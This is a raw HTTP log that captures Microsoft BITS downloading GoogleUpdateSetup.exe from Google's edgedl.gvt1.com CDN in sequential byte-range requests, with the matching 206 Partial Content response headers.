HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 13599 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3149 content-range: bytes 4814-18412/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=18413-29842 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 11430 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3157 content-range: bytes 18413-29842/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=29843-41274 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 11432 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3162 content-range: bytes 29843-41274/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=41275-51227 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 9953 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3176 content-range: bytes 41275-51227/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=51228-67422 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 16195 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3177 content-range: bytes 51228-67422/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=67423-88386 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 20964 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3178 content-range: bytes 67423-88386/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=88387-151561 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 63175 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3179 content-range: bytes 88387-151561/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=151562-283433 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 131872 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3180 content-range: bytes 151562-283433/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=283434-544245 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 260812 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3181 content-range: bytes 283434-544245/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=544246-1064661 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 520416 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3182 content-range: bytes 544246-1064661/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=1064662-1304159 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 239498 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3183 content-range: bytes 1064662-1304159/1304160 cache-control: public,max-age=3600